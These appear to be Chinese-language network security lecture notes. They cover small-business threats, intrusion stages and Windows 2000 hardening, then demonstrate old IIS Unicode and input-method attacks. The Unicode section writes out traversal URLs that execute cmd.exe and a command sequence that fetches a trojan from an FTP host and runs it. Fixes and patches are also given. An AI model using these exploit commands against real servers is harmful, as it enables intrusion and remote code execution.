总结中小型商业环境的网络安全的特点:
1.安全保护能力差;
2.安全威胁主要来自于内部和外部两大方面;
3.由于没有足够的安全投入导致安全问题一旦发生并不好即时解决;
4.从业人员安全意识的淡泊是主要安全隐患;
5.病毒对系统安全的影响巨大。
第二部分:网络安全基础知识
?什么是网络安全?
在网络环境中的一种能够识别和消除不安全因素的能力。
?安全即寻求平衡
一个关键的安全原则是使用有效但是并不会给那些真正想要获取信息的合法用户增加负担的方案。
?安全有效性
最安全的方法就是将计算机的网线拔掉并锁进保险柜,但是这样的安全显然无效。
?建立有效的安全矩阵
由单个操作系统安全特性、日志服务、防火墙、入侵检测系统、审查方案构成了有效的安全矩阵,注意,它是立体的。
?安全策略
建立并实施良好的安全策略是安全策略是一个企业成功实现网络安全的关键。
第三部分:网络入侵的3个阶段:P、D、C
?Discovery 发现(使用WSping/SSS/流光等)
?Penetration 渗透(使用NAT/LC3等)
?Control 控制(安装后门/抹除痕迹等)
第四部分:Windows安全8大法宝
一台没有经过任何安全配置的win2000计算机是处于非常高风险的状态的。
这样的Win2000系统被成为"Out-of-the-box"
?Resource information exposed 资源信息暴露
?Default access control 默认的访问控制
?Weak password encryption 脆弱的密码加密
?Weak audit policy 薄弱的审核策略
举例:SSS扫描一台新安装好的Win2000 ADV Server 扫描报告
Win2000安全防护8大法宝
?打补丁(PATCH)和HOTFIX
?删除不必要的服务
?锁定不必要的端口
?重新配置WEB和FTP服务
?修改注册表
?采用加强的身份认证
?设置全面审核和使用日志
?使用防火墙
第六部分:网络安全实例讲解(NETBUS攻击、利用Win2000输入法漏洞攻击、UNICODE漏洞演示)
先谈谈UNICODE漏洞,这是2001年微软IIS10大漏洞之首
利用IIS编码时的漏洞,在一个可执行的目录中执行命令
%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
下面的URL可能列出当前目录的内容:
http://www.目标机.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
http://www.目标机.com/ a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
http://x.x.x.x/scripts/..%c1%1c../
winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe
在英文版本中使用 %c1%af 能正常利用这个漏洞
利用这个漏洞安装木马:
1.找一个ftp服务器,将须上载的文件copy 到ftp服务器上,假设这个 ftp server的 ip:192.168.0.100 ,username:neptune,password:abcd123 文件名:Patch.exe
2.编辑一个上载执行文件 http://ip/scripts/ccc.exe?/c+echo+open+192.168.0.100+up.txt http://ip/scripts/ccc.exe?/c+echo+neptune+up.txt (号前不要有空格)
http://ip/scripts/ccc.exe?/c+echo+abcd123
+up.txt http://ip/scripts/ccc.exe?/c+echo+get patch.exe
+up.txt http://ip/scripts/ccc.exe?/c+echo+quit+up.txt http://ip/scripts/ccc.exe?/c+ftp+-s:up.txt
3.在scripts目录中执行木马程序
防范方法:将操作系统或IIS默认安装目录改名,删除Scripts目录
输入法漏洞:
使用WIN2000终端方式利用输入法漏洞对WIN2000SERVER进行攻击
演示
攻击方式:Windows2000 BUGS
被攻击主机IP:192.168.0.123
被攻击主机操作系统:Winows2000 Advanced Server
发动攻击平台:Windows2000 Professional
使用工具:Windows2000 终端客户端软件
修补方式:
1、删除有BUG文件:win2000的安装目录下(如:C:WINNT)的help目录下,对应的帮助文件是: ※?WINIME.CHM?输入法操作指南? ※?WINSP.CHM?双拼输入法帮助? ※?WINZM.CHM?郑码输入法帮助? ※?WINPY.CHM?全拼输入法帮助? ※?WINGB.CHM?内码输入法帮助?
2、打补丁(SP1)
